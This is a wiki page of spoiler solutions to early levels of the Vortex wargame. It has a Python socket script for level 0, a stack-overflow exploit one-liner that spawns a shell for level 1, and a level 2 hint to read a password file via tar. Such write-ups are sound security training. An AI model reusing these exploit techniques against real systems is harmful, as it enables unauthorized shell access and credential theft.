
Wicrawl Roadmap



Overview

This section contains some notes and solutions to the challenges on [1].

There are spoilers on this page, so don't read too far if you don't want your education to suffer.

Level 0

The instructions don't say that you have to send the result back in binary, or that it should probably be a 64-bit integer ("long long"): four random 32-bit numbers usually add up to something larger than a 32-bit integer can hold. Here's one way to do it:

#!/usr/bin/env python

import sys
from struct import pack, unpack
from socket import socket, AF_INET, SOCK_STREAM

s = socket(AF_INET, SOCK_STREAM)
s.connect(("vortex.labs.pulltheplug.org", 5842))

# Read exactly 16 bytes: recv() may return fewer bytes than asked for,
# so keep reading until all four 32-bit integers have arrived.
buf = ""
while len(buf) < 16:
        chunk = s.recv(16 - len(buf))
        if not chunk:
                sys.exit("connection closed before 16 bytes arrived")
        buf = buf + chunk

print len(buf)
# Four unsigned 32-bit integers in the machine's native byte order
ints = unpack("IIII", buf)

# The sum can exceed 32 bits, so send it back as a 64-bit integer ("Q")
result = ints[0] + ints[1] + ints[2] + ints[3]
print result

s.send(pack("Q", result))
print s.recv(1000)
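As an added example (not code from the original wiki page), here is the same exchange in Python 3 with the two points the notes make spelled out: reading exactly 16 bytes even when recv() returns short, and keeping the sum in 64 bits so it does not wrap. The network socket is replaced by a constructed in-memory stand-in so it runs offline, the sample values are constructed, and little-endian byte order is assumed (what the original script's native-order "IIII" means on x86).

```python
import struct

# Constructed sample: four unsigned 32-bit values whose sum is 2**33 - 1,
# one bit too wide for a 32-bit integer. "<" = little-endian, which is what
# the original script's native-order "IIII" means on x86 (an assumption).
SAMPLE_INTS = (0xFFFFFFF0, 0x80000000, 0x7FFFFFFF, 0x00000010)
SAMPLE_PAYLOAD = struct.pack("<IIII", *SAMPLE_INTS)


class ChunkedSocket:
    """Stand-in for a socket: returns at most `chunk` bytes per recv() and
    b'' at EOF, mimicking the short reads a TCP stream can give."""

    def __init__(self, data, chunk):
        self.data, self.chunk, self.pos = data, chunk, 0

    def recv(self, n):
        piece = self.data[self.pos:self.pos + min(n, self.chunk)]
        self.pos += len(piece)
        return piece


def recv_exact(sock, n):
    """Read exactly n bytes, looping over short reads; raise on early close."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def sum_as_u32(payload):
    """The wrong answer you get by keeping the sum in a 32-bit int: it wraps."""
    return sum(struct.unpack("<IIII", payload)) & 0xFFFFFFFF


def solve_level0(payload):
    """Unpack four u32s and return their sum as an 8-byte (64-bit) reply."""
    return struct.pack("<Q", sum(struct.unpack("<IIII", payload)))


if __name__ == "__main__":
    reply = solve_level0(recv_exact(ChunkedSocket(SAMPLE_PAYLOAD, 3), 16))
    print("64-bit reply:", reply.hex(), "=", struct.unpack("<Q", reply)[0])
    print("32-bit wrap: ", hex(sum_as_u32(SAMPLE_PAYLOAD)))
```

Against the real server you would replace ChunkedSocket with a connected socket and call recv_exact(s, 16) before solve_level0.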

Level 1

The first thing we need to do is make a stack picture. It looks like this:

^
|
higher memory

RIP MSB
RIP
RIP
RIP LSB
EBP MSB
EBP
EBP 
EBP LSB
buf[255]
buf[254]
.
.
.
buf[0]
ptr MSB <-- target
ptr
ptr
ptr LSB 

lower memory
|
v

MSB stands for most significant byte, and LSB stands for least significant byte. Remember that on x86, the four bytes of a four-byte integer are stored in little-endian order, so the LSB is the first thing in memory if you're looking from low to high memory.

The trick here is to write two bytes after decrementing the pointer, because you have to trigger the call to e() after writing the 0xca overflow byte. Now, if you do something like this:

perl -e 'print "\\" x 257 . "\xca"' >> /tmp/slashes
/levels/level1 < /tmp/slashes

You'll see this:

bash-2.05b$ /levels/level1 < /tmp/slashes
sh-2.05b$ exit
bash-2.05b$

What happened?

Well, after the shell spawns, it tries to read commands from standard input. But you redirected its standard input from the file /tmp/slashes, and your exploit already consumed all of that file's input. So the shell tries to read and gets an EOF, which bash treats the same as the exit command. Try it by hitting CTRL-D, the UNIX EOF character, in a shell -- you'll immediately get logged out.

So that the exec'ed shell doesn't immediately read EOF and quit, you can cut and paste the overflow string to the terminal while executing level1 interactively. That way, your keyboard will be connected to the spawned shell's standard input, and you can run commands.

Level 2

Just create a tar archive. But what to put in it? The password, of course, which is in /etc/pass/level3.

Retrieved from "http://www.midnightresearch.com/wiki/index.php/Wicrawl_Roadmap"

This page has been accessed 3,885 times. This page was last modified on 17 July 2007, at 05:45.
